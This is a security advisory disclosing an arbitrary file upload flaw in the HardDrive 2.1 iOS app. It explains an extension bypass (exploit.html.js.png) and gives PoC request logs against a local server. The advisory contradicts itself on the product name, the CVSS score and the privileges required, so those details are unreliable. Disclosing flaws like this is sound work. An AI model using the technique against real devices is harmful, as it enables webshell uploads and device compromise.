143 lines
No EOL
4.3 KiB
Text
143 lines
No EOL
4.3 KiB
Text
# Title: HardDrive 2.1 for iOS - Arbitrary File Upload
|
|
# Author: Vulnerability Laboratory
|
|
# Date: 2020-04-30
|
|
# Software: https://apps.apple.com/ch/app/harddrive/id383226784
|
|
# CVE: N/A
|
|
|
|
Document Title:
|
|
===============
|
|
HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
https://www.vulnerability-lab.com/get_content.php?id=2221
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
7.4
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
Store+Organize+Edit+Protect+Import+Download+View+Share your files right
|
|
from your iPhone! Transform your
|
|
iPhone/iPod touch into a real HardDrive with no extra cable or software.
|
|
|
|
(Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 )
|
|
|
|
|
|
Affected Product(s):
|
|
====================
|
|
Sebastien BUET
|
|
HardDrive v2.1 - Apple iOS Mobile Web Application
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2020-04-29: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
An arbitrary file upload web vulnerability has been discovered in the
|
|
official Air Sender v1.0.2 iOS mobile application.
|
|
The web vulnerability allows remote attackers to upload arbitrary files
|
|
to compromise for example the file system of a service.
|
|
|
|
The arbitrary upload vulnerability is located in the within the
|
|
web-server configuration when using the upload module.
|
|
Remote attackers are able to bypass the local web-server configuration
|
|
by an upload of malicious webshells. Attackers
|
|
are able to inject own files with malicious `filen` values in the
|
|
`upload` POST method request to compromise the
|
|
mobile web-application. The application does not perform checks for
|
|
multiple file extensions. Thus allows an attacker
|
|
to upload for example to upload a html.js.png file. After the upload the
|
|
attacker requests the original url source
|
|
with the uploaded file and removes the unwanted extension to execute the
|
|
code in the unprotected web-frontend.
|
|
|
|
The security risk of the vulnerability is estimated as high with a
|
|
common vulnerability scoring system count of 7.0.
|
|
Exploitation of the web vulnerability requires a low privilege ftp
|
|
application user account and no user interaction.
|
|
Successful exploitation of the arbitrary file upload web vulnerability
|
|
results in application or device compromise.
|
|
|
|
Request Method(s):
|
|
[+] POST
|
|
|
|
Vulnerable Module(s):
|
|
[+] ./upload
|
|
|
|
Vulnerable File(s):
|
|
[+] file
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
The arbitrary file upload web vulnerability can be exploited by remote
|
|
attackers without user interaction or privileged user accounts.
|
|
For security demonstration or to reproduce the web vulnerability follow
|
|
the provided information and steps below to continue.
|
|
|
|
|
|
PoC: Vulnerable Source (File Dir Listing Index)
|
|
<tr><td width="100px" valign="middle" align="left"><img
|
|
src="exploit.html"></td><td width="300px" valign="middle" align="left">
|
|
<a href="exploit.html.js">exploit.html.js</a></td> <td width="454px"
|
|
valign="middle" align="left">
|
|
<em valign="middle" align="center">size: 256.7 Kb
|
|
|
|
|
|
PoC: Exploitation
|
|
http://localhost:50071/exploit.html.js
|
|
|
|
|
|
--- PoC Session Logs [POST] --- (file)
|
|
http://localhost:50071/
|
|
Host: localhost:50071
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
|
|
Gecko/20100101 Firefox/75.0
|
|
Accept:
|
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------9331569428946906291010349387
|
|
Content-Length: 263181
|
|
Origin: http://localhost:50071
|
|
Connection: keep-alive
|
|
Referer: http://localhost:50071/
|
|
file=exploit.html.js.png&button=Submit
|
|
POST: HTTP/1.1 200 OK
|
|
Accept-Ranges: bytes
|
|
Content-Length: 381654
|
|
-
|
|
http://localhost:50071/exploit.html.js
|
|
Host: localhost:50071
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
|
|
Gecko/20100101 Firefox/75.0
|
|
Accept: image/webp,*/*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Connection: keep-alive
|
|
-
|
|
http://localhost:50071/exploit.html
|
|
GET: HTTP/1.1 200 OK
|
|
Accept-Ranges: bytes
|
|
Content-Length: 366735
|
|
|
|
|
|
Credits & Authors:
|
|
==================
|
|
Vulnerability-Lab -
|
|
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
|
Benjamin Kunz Mejri -
|
|
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
|
|
|
|
|
--
|
|
VULNERABILITY LABORATORY - RESEARCH TEAM |